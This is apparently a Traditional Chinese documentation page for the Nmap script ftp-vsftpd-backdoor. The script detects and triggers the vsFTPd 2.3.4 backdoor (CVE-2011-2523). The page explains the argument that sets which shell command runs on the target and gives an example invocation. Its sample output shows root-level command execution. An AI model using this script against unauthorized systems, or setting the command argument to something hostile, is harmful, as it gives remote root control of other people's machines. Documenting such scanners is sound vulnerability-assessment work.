Nmap Script指令摘要
這個指令用於檢測 vsFTPd 2.3.4 的後門漏洞,該漏洞於 2011 年 7 月 4 日被揭露(CVE-2011-2523);預設情況下,該指令嘗試使用無害的 "id" 命令來利用後門,但您可以透過設置 "exploit.cmd" 或 "ftp-vsftpd-backdoor.cmd" 指令參數來更改要利用該漏洞的命令。
參考資料:
Nmap Script指令參數
ftp-vsftpd-backdoor.cmd
在攻擊目標的 shell 中執行的命令(預設為 "id");如果成功利用 vsFTPd 2.3.4 的後門漏洞,這個命令將在目標系統上執行。
vulns.short, vulns.showall
關於 "vulns.short" 和 "vulns.showall",請查看 vulns 函示庫以瞭解更多詳細訊息;這些參數通常用於控制漏洞訊息的顯示方式和細節。
Nmap Script指令範例
nmap --script ftp-vsftpd-backdoor -p 21 <host>
Nmap Script指令輸出
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2011-2523 BID:48539
| Description:
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| The backdoor was already triggered
| Shell command: id
| Results: uid=0(root) gid=0(root) groups=0(root)
| References:
| https://www.securityfocus.com/bid/48539
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
Nmap Script作者:
Daniel Miller
License: Same as Nmap--See https://nmap.org/book/man-legal.html